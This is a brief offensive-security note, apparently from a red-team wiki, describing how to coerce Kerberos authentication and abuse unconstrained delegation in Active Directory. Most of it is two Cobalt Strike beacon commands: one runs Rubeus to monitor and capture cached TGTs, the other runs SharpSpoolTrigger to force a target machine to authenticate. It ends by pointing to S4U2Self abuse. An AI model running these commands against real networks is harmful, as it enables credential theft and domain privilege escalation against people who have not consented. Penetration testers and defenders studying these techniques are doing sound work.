Coercing Kerberos authentication can be useful for unconstrained delegation where a user’s successful authentication will result his TGT getting cached.
First start Rubeus to periodically scan for new cached TGTs:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrapUse SharpSpoolTrigger to force authentication (other tools exist, see Related):
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe [target-fqdn] [listener-fqdn]This will result in a machine account TGT, which could be exploited using S4U2Self abuse.